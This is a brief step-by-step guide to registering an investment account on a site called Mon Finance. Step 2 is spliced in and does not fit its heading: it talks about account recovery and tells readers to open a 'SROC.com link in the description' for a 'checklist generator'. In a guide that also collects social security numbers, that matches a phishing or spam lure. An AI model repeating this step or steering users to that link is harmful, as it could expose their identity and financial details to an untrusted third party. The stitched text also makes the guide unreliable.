Creating an account on Mon Finance is a straightforward process that allows you to manage your investments easily. Follow these steps to set up your account. Step 1. Visit the Mon Finance website. Go to the official Mon Finance website using your preferred web browser. Look for the Sign Up or Get Started button on the homepage to begin the registration process. Step 2. Provide your information. Before starting recovery, use the SROC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Create a password. Choose a strong password for your account. It should be a combination of letters, numbers, and special characters to ensure security. Confirm your password by entering it again in the designated field. Step 4. Complete the application. Follow the prompts to provide additional information, such as your address, date of birth, and social security number. This information is necessary for identity verification and compliance with financial regulations. Step 5. Review and submit. Review all the information you have entered for accuracy. Once you are satisfied, submit your application. You may receive a confirmation email to verify your account, so check your inbox and follow any further instructions provided. Once you have completed these steps, your Mon Finance account will be set up and you can start managing your investments. Happy investing!